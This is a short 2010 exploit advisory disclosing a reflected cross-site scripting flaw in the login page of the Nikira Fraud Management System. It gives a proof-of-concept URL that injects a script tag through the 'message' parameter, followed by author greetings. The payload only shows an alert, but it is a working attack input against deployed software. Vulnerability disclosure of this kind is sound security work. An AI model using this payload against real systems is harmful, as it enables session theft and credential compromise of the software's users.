-------------------------------------------------------------------- # Exploit Title: Nikiara Fraud Management System XSS Vulnerability # Date: 10 Feb 2010 # Author: thebluegenius # Software Link: http://www.subexworld.com/fraud-management.html # Version: All # Tested on: Unix | Apache 2.2.4 # CVE : NA --------------------------------------------------- "Nikara Fraud Management System" XSS vulnerability. --------------------------------------------------- By :Thebluegenius. Email :rajsm@isac.org.in Blog :thebluegenius.com. --------------------------------------------------- Description: Nikira Fraud Management System is the next generation fraud management solution built to deliver on a 3-step philosophy of Detect-Investigate-Protect. Nikira detects known fraud types and patterns of unusual behaviour, helps investigate these unusual patterns for potential fraud, and uses the knowledge, thus generated, to upgrade and protect against future intrusions. The vulnerability lies at client login page. Presently this product is deployed at over 90% of Telecom companies across the world. ------------------ Vulnerability: XSS ------------------ you can execute XSS as given below: http://IPaddress:port/login/prompt?message=%3Cscript%3Ealert%28%27Reflected%20XSS%27%29%3C/script%3E ----------------------------------------------------- Greetz Fly Out to: 1] Amforked() : My good friend 2] Aodrulez : for inspiring me 3] www.OrchidSeven.com 4] www.isac.org.in